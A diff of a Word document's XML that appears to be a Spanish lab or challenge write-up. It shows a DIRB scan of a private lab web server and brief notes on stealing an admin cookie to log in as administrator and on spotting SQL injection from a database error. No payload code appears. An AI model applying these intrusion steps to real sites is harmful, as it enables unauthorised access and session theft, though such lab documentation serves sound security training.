--- a/GENERAL_TEAM_CHALLENGES/RETO_8/fingerprint.docx
+++ b/GENERAL_TEAM_CHALLENGES/RETO_8/fingerprint.docx
@@ -4,6 +4,9 @@
   <w:body>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="429D351B" wp14:editId="00EC4602">
             <wp:extent cx="5400040" cy="4265295"/>
@@ -20,7 +23,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId4"/>
+                    <a:blip r:embed="rId5"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -41,6 +44,5723 @@
         </w:drawing>
       </w:r>
     </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="064AE1D2" wp14:editId="29684E99">
+            <wp:extent cx="5400040" cy="4804410"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="227554709" name="Imagen 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="227554709" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId6"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5400040" cy="4804410"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E29309A" wp14:editId="481B2304">
+            <wp:extent cx="5400040" cy="3100705"/>
+            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
+            <wp:docPr id="90384562" name="Imagen 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="90384562" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId7"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5400040" cy="3100705"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">DIRB v2.22    </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>By The Dark Raver</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>-----------------</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>START_TIME: Wed Jul 24 04:29:05 2024</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>URL_BASE: http://10.0.2.20/</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>WORDLIST_FILES: /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>usr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>/share/dirb/wordlists/common.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>-----------------</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">GENERATED WORDS: 4612                                                          </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>---- Scanning URL: http://10.0.2.20/ ----</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">==&gt; DIRECTORY: http://10.0.2.20/admin/                                                                          </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">+ http://10.0.2.20/all (CODE:200|SIZE:644)                                                                      </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">+ http://10.0.2.20/cgi-bin/ (CODE:403|SIZE:285)                                                                 </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">==&gt; DIRECTORY: http://10.0.2.20/classes/                                                                        </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">==&gt; DIRECTORY: http://10.0.2.20/css/                                                                            </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">+ http://10.0.2.20/favicon.ico (CODE:200|SIZE:14634)                                                            </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">+ http://10.0.2.20/footer (CODE:200|SIZE:185)                                                                   </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">+ http://10.0.2.20/header (CODE:200|SIZE:571)                                                                   </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">==&gt; DIRECTORY: http://10.0.2.20/images/                                                                         </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">+ http://10.0.2.20/index (CODE:200|SIZE:1311)                                                                   </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">+ http://10.0.2.20/index.php (CODE:200|SIZE:1311)                                                               </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">+ http://10.0.2.20/post (CODE:200|SIZE:786)                                                                     </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">+ http://10.0.2.20/server-status (CODE:403|SIZE:290)                                                            </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">                                                                                                                </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>---- Entering directory: http://10.0.2.20/admin/ ----</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">+ http://10.0.2.20/admin/del (CODE:302|SIZE:0)                                                                  </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">+ http://10.0.2.20/admin/edit (CODE:302|SIZE:0)                                                                 </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">+ http://10.0.2.20/admin/footer (CODE:200|SIZE:19)                                                              </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">+ http://10.0.2.20/admin/header (CODE:200|SIZE:653)                                                             </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">+ http://10.0.2.20/admin/index (CODE:302|SIZE:0)                                                                </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">+ http://10.0.2.20/admin/index.php (CODE:302|SIZE:0)                                                            </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">+ http://10.0.2.20/admin/login (CODE:200|SIZE:1387)                                                             </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">+ http://10.0.2.20/admin/logout (CODE:302|SIZE:0)                                                               </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">+ http://10.0.2.20/admin/new (CODE:302|SIZE:0)                                                                  </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">==&gt; DIRECTORY: http://10.0.2.20/admin/uploads/                                                                  </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">                                                                                                                </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>---- Entering directory: http://10.0.2.20/classes/ ----</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">(!) WARNING: Directory IS LISTABLE. No need to scan it.                        </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    (Use mode '-w' if you want to scan it anyway)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">                                                                                                                </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>---- Entering directory: http://10.0.2.20/css/ ----</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">(!) WARNING: Directory IS LISTABLE. No need to scan it.                        </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    (Use mode '-w' if you want to scan it anyway)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">                                                                                                                </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>---- Entering directory: http://10.0.2.20/images/ ----</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">(!) WARNING: Directory IS LISTABLE. No need to scan it.                        </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    (Use mode '-w' if you want to scan it anyway)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">                                                                                                                </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>---- Entering directory: http://10.0.2.20/admin/uploads/ ----</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">(!) WARNING: Directory IS LISTABLE. No need to scan it.                        </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    (Use mode '-w' if you want to scan it anyway)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">                                                                               </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>-----------------</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Ejecuto </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>pscript</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> para </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sacr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> cookie admin y entrar de administrador</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B05A990" wp14:editId="511FA2B2">
+            <wp:extent cx="5400040" cy="3310890"/>
+            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
+            <wp:docPr id="1555765656" name="Imagen 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1555765656" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId8"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5400040" cy="3310890"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="759C1CEC" wp14:editId="61B61819">
+            <wp:extent cx="5400040" cy="1640205"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1265667392" name="Imagen 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1265667392" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId9"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5400040" cy="1640205"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Conseguida la </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>cooke</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E6AE68F" wp14:editId="5D584234">
+            <wp:extent cx="5400040" cy="2962275"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="1782498485" name="Imagen 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1782498485" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId10"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5400040" cy="2962275"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Vulnerable a SQLi</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>  La</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> función </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>mysql_fetch_assoc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>() espera un recurso (resultado de una consulta SQL), pero ha recibido un valor booleano (false).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Causa</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Esto suele ocurrir cuando la consulta SQL ha fallado, y </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>mysql_query</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>() ha devuelto false.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>el sistema no está manejando adecuadamente la entrada del usuario y es probable que sea vulnerable a inyección SQL</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
